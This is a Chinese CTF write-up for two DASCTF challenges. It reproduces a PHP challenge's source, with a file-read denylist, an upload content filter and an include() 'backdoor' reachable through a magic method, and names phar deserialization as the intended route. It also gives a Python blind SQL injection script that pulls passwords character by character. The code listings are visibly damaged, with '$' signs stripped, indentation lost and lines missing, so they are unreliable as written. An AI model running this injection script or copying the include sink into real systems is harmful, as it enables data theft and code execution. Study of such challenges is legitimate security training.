书接上回,DASCTF由于我那天蹲24h麦当劳睡了一个晚上,到了酒店继续睡了一个下午,导致看到这题的时候已经只剩下一小时了。最后比赛结束后一个多小时才解出来,不过博客还是要有的。
Ez to getflag
这题第一眼看,任意文件读,然后获取源码Getshell。
其实呢,直接 `/flag`,就出了,可以说是非预期吧。
从原题思路的角度来说,我们先读取 `file.php` 和 `upload.php`,获取后端源码
//file.php
// NOTE(review): only the tail of file.php survived extraction. The lines
// before `show();` (presumably `<?php`, the include of class.php mentioned in
// the text, and the construction of the object whose show() is called) are
// not in this listing, and the `$` sigils are gone, so `show();` is most
// likely `$<obj>->show();` on a Show instance.
show();
?>
///upload.php
// NOTE(review): same extraction loss as file.php above: the opening tag,
// include and object construction are missing, and `uploadfile();` is
// presumably a method call on an instance of the upload class from class.php.
uploadfile();
?>
里面嵌套了一个 `class.php`,也读出来
//class.php
// NOTE(review): the `<?php` line, the class header and the constructor
// signature are missing from this listing; what remains is the end of a
// constructor that stores $_FILES into $this->f (sigils lost in extraction).
f = _FILES;
}
// NOTE(review): the `$` sigils were lost in extraction throughout this class
// (`fname`, `this->f`, `cont`, `size` read as `$fname`, `$this->f`, ...).
// savefile(): derives the stored name as md5(<client-supplied name>) . ".png"
// and moves the temp file under upload/. If a file of that name already
// exists it is unlinked first (with `@`, so a failed unlink is silent), i.e.
// a re-upload replaces the earlier file. The return value of
// move_uploaded_file() is not checked before "upload success! :D" is printed.
function savefile() {fname = md5(this->f["file"]["name"]).".png"; if(file_exists('./upload/'.fname)) {
@unlink('./upload/'.fname);
}
// The next line holds the end of savefile() followed by __toString().
// __toString(): reads $this->fname and $this->fsize (neither is assigned
// anywhere in the visible listing) and then performs what appears to be a
// dynamic property read `$cont->$size` — the property NAME comes from
// $this->fsize. Always returns the literal 'this_is_upload'.
move_uploaded_file(this->f["file"]["tmp_name"],"upload/" . fname); echo "upload success! :D"; } function __toString(){cont = this->fname;size = this->fsize;
echocont->size;
return 'this_is_upload';
}
// uploadfile(): entry point for the upload — runs file_check() and only on
// success calls savefile(). Nothing is echoed here on rejection; file_check()
// prints its own message.
function uploadfile() { if(this->file_check()) {
this->savefile(); } }
// file_check(): gate applied before savefile(). Accepts (returns true) only
// when
//   (1) the text after the LAST "." of the client-supplied name is in
//       allowed_types (just "png"; in_array() is case-sensitive here), and
//   (2) the uploaded file's CONTENT does not match the `filter` denylist
//       (case-insensitive, substring match — "file" also rejects harmless
//       content such as the word "profile").
// Echoes a message and returns false otherwise.
// Defender notes: a keyword denylist on file content is inherently
// incomplete; preg_match_all() returns false on a PCRE error (for example a
// backtrack-limit hit on a large file) and false is treated here as "clean",
// so a strict comparison that fails closed would be safer.
function file_check() {allowed_types = array("png");
temp = explode(".",this->f["file"]["name"]);
extension = end(temp);
if(empty(extension)) { echo "what are you uploaded? :0";
return false;
}
// Note that this line kept its `$` sigils in extraction while the rest did not.
else{ if(in_array(extension,allowed_types)) {filter = '/<\?php|php|exec|passthru|popen|proc_open|shell_exec|system|phpinfo|assert|chroot|getcwd|scandir|delete|rmdir|rename|chgrp|chmod|chown|copy|mkdir|file|file_get_contents|fputs|fwrite|dir/i';
$f = file_get_contents($this->f["file"]["tmp_name"]);
if(preg_match_all(filter,f)){
echo 'what are you doing!! :C';
return false;
}
return true;
}
else {
echo 'png onlyyy! XP';
return false;
}
}
}
}
// Show: reads and renders a file whose path ($this->source) is supplied by
// the caller of the constructor. NOTE(review): `$` sigils are missing in
// this listing (`source`, `fname`, `name`, `arguments`, `door`).
class Show{
public source;
public function __construct(fname)
{
this->source =fname;
}
// show(): case-insensitive denylist on the path (a few URL scheme names and
// ".."), then echoes the raw file content and builds a base64 "data:" URI
// from the same content. The markup printed by the second echo (presumably
// an <img> tag using $src) did not survive extraction — only the quotes
// remain. Defender notes: this denylist is the only guard between caller
// input and file_get_contents(); an allowlist of permitted files, or a
// realpath() check against a fixed base directory, would be the robust fix.
public function show()
{
if(preg_match('/http|https|file:|php:|gopher|dict|\.\./i',this->source)) {
die('illegal fname :P');
} else {
echo file_get_contents(this->source);
src = "data:jpg;base64,".base64_encode(file_get_contents(this->source));
echo "
";
}
}
// __get(): invoked for reads of undefined properties; forwards the property
// name to ok(), which is not defined anywhere in this listing.
function __get(name)
{this->ok(name);
}
// __call(): invoked for calls to undefined methods. Takes the LAST element
// of the argument list: if it loosely (==) equals 'phpinfo' it calls
// phpinfo(), otherwise it hands that value to backdoor(). Returns the
// method name.
public function __call(name, arguments)
{
if(end(arguments)=='phpinfo'){
phpinfo();
}else{
this->backdoor(end(arguments));
}
return name;
}
// backdoor(): include() of a caller-controlled value — a file-inclusion sink
// reachable through __call() above. This is the deliberate weakness of the
// challenge; in real code no magic method should forward its input to
// include().
public function backdoor(door){
include(door);
echo "hacked!!";
}
// __wakeup(): runs on unserialize(). Same denylist as show() except that
// "php:" is absent here, so the two filters are not consistent — when a
// check is duplicated it should be a single shared helper.
public function __wakeup()
{
if(preg_match("/http|https|file:|gopher|dict|\.\./i",this->source)) {
die("illegal fname XD");
}
}
}
// Test: trivial class whose destructor echoes whatever is stored in str when
// the object is destroyed. The constructor stores a fixed string; nothing in
// this listing assigns anything else to it. (This line kept its `$` sigil;
// the rest of the file lost them in extraction.)
class Test{
public str;
public function __construct(){this->str="It's works";
}
public function __destruct()
{
echo $this->str;
}
}
?>
发现 ban 了 gopher 协议,那就直接用 phar 反序列化做就好
绝对防御
这题其实可以自己找网页的接口,不过在这么一个静态网页里面找出来还是有点难,至少我找了好久才找到。
最后被人安利了一个这样的插件
一下子就找到了,真的舒服,然后就是正常的联合盲注,注表名,注数据了。
发现自己以前写的盲注脚本好丑,抄一个好看的上来。
# Boolean-based blind SQL injection extractor, as pasted in the writeup.
# NOTE(review): the loop bodies have lost their indentation in extraction
# (both `for` loops, the `if` and its body are all at column 0), so this
# listing does not run as-is. The host part of `url` is also blank — treat
# it as a placeholder for the challenge server.
import string
import requests
url = 'http:///SUPPERAPI.php?id='
# `char` and `digit` are built but never read; the inner loop walks the full
# printable ASCII range 32..127 instead.
char = string.ascii_lowercase + string.ascii_uppercase + string.digits + "{}-_~!,"
digit = string.digits
flag = ""
# Outer loop: character position i in group_concat(password); inner loop:
# candidate code point j. The oracle is the word "admin" appearing in the
# response. Defender notes: this produces up to 96 sequential requests per
# recovered character, all carrying `||` and `ascii(substr(` in the `id`
# parameter — request volume plus those substrings make it easy to pick out
# of access logs, and parameterised queries on the server remove the issue.
for i in range(1,100):
for j in range(32,128):
print(j)
payload = f"ascii(substr((select group_concat(password) from users), {i}, 1))='{j}'"
data = f"0||{payload}"
res = requests.get(url + data)
if "admin" in res.text:
flag += chr(j)
print("flag:" + flag)
break